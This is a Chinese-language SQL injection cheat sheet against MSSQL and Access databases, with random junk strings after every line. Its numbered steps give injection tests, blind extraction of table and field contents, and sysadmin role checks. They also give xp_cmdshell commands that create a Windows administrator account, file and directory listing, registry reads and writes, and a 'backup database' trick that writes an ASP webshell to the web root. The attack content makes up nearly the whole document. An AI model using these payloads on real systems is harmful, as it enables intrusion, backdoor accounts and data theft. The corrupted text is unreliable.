1.判断是否有注入;and 1=1 ;and 1=2 {xt<`_R
2.初步判断是否是mssql ;and user>0 !D%*s,t\'
A"Rzn1/
3.注入参数是字符'and [查询条件] and ''=' %5RYa<oP
@M4~,O6-
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ^ j@Q2>&?
Kq`Luf
5.判断数据库系统 |6B:tw/.
*Rshzv[
;and (select count(*) from sysobjects)>0 mssql *MkhRLw\,
L}A R{
;and (select count(*) from msysobjects)>0 access !mL,Ue3/
ac.O#6&
\E.t=XBn
14\%2nE
6.猜数据库 ;and (select Count(*) from [数据库名])>0 .]Z M2
{mL/)\
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 f7X#cs)a
&tZ?%sr
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 UA,&0.7
MCQ>BP
9.(1)猜字段的ascii值(access) oO @6c %
'KQ]7
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 W<2%J)N<
uYL6g:]+ZC
(2)猜字段的ascii值(mssql) )F? 57eh
P0Na<)\'Y!
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 !N,Z3p>Q
5 LX3.
10.测试权限结构(mssql) z$G?J+?J
p%IR4f
>^:g[6Sj
nAF@47Wo
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- v\-"NHl
sNvT0
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- '*>LZo4
t@.gmUUA
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 7OtQK`P"A
`P/* x[?
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- U`6QD}c"s
i*_KHK
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- p{Pa(Z]G
W~k!qy `
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- [&nwB!kt
U]R?O5K
;and 1=(select IS_MEMBER('db_owner'));-- 8tA.d.8
wt2S[:!p
3N+P~v)T'
,_rarU)[J
11.添加mssql和系统的帐户 =La}^
9 b]U&A$
;exec master.dbo.sp_addlogin username;-- eiEZtu
;exec master.dbo.sp_password null,username,password;-- F:pXdU-xf
v/+ dx/
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- *,
*"G?
FZ=6x}QZ
;exec master.dbo.xp_cmdshell 'net user username password cYR6+PKua
bwVv#Z\r
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- a
#@Q.wL
YGWb!|Z$
;exec master.dbo.xp_cmdshell 'net user username password /add';-- +1d\ZZA|6&
V"$t>pAG
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- Sa,N1r
'EZ[aY!);
EE}NA{b
}#'KME4
12.(1)遍历目录 Nr`nL_DQ
lR.a3.~
;create table dirs(paths varchar(100), id int) 2 )j\Lg_M
1.,mNY^UN
;insert dirs exec master.dbo.xp_dirtree 'c:\' d`~#uN {
FG#j0#|*
;and (select top 1 paths from dirs)>0 c+a f=ac
f{AgKW9"
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) i"rMP#7
a|nlmH"l
_9z/>e
+=k?Dp[
(2)遍历目录
=oQzL
rG\m]C3 E
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- CzvlZDo
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 'R,d?ikY
ZC2C`S\xr
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 5?O/Aub
Q`vyDoF
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ?>%u[g
k5/nAaiVE
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ,xTbt4J
Y~vTFOI
_5`M( ;hL2
K&)a3Z=(.
13.mssql中的存储过程 ]#BXaBVMY
}qKeX4\-
xp_regenumvalues 注册表根键, 子键 >`{i[60r
{Y0I A97,
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 (Wx)YI
=k$d8g
ez
xp_regread 根键,子键,键值名 Q%eBm_r;
`|/|ej]$P
;exec xp_regread VBH[aIW
Nb];LCx
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 %M`|0g}!
%<M<'jxSca
xp_regwrite 根键,子键, 值名, 值类型, 值 u^]yz&9V
p +T&9
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 D~?kvyJ
P);Xke
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 )K?GAj]Pq
! 4oIx`
xp_regdeletevalue 根键,子键,值名 Qy70/on9
VuPET
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 dt \O7Rjw8
<oXsn.'\
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 i3%~Gc63
~qqtFjlG^
J.nVEqLZ
xlwsZm{V
14.mssql的backup创建webshell 'I<j`)4`d
iit`'}+U
use model N )!v-z,k
[e}]K:
create table cmd(str image); ky~ x4_y5
&(rd{j/*
insert into cmd(str) values (''); Dq?2mXOqD
SRD&Uf0M
backup database model to disk='c:\l.asp'; Rke:*(p*n;
^=W&p%Y(!
TdE_\gEo/R
f.f4<_v'h
15.mssql内置函数 Z|/):nVP7
F4&N;Zm2
;and (select @@version)>0 获得Windows的版本号 &.z/dFmG
]rN fr-
;and user_name()='dbo' 判断当前系统的连接用户是不是sa +[qkG.
O
L_.}z)S[\
;and (select user_name())>0 爆当前系统的连接用户 K%gFD?{^q
b>7ts_b
;and (select db_name())>0 得到当前连接的数据库 |M?HdxPa
UF%5/SiVX
3LxJ}>]TO
|X.z|wKT6
16.简洁的webshell q#a21~S<
,9pi9\S
use model )KuvG:+9W
?oJ~3Kg
create table cmd(str image); 5&kR1Bp#-
R:xmcUq}
(
insert into cmd(str) values ('');
vXvV5Oq
@TprSd
backup database model to disk='g:\wwwtest\l.asp';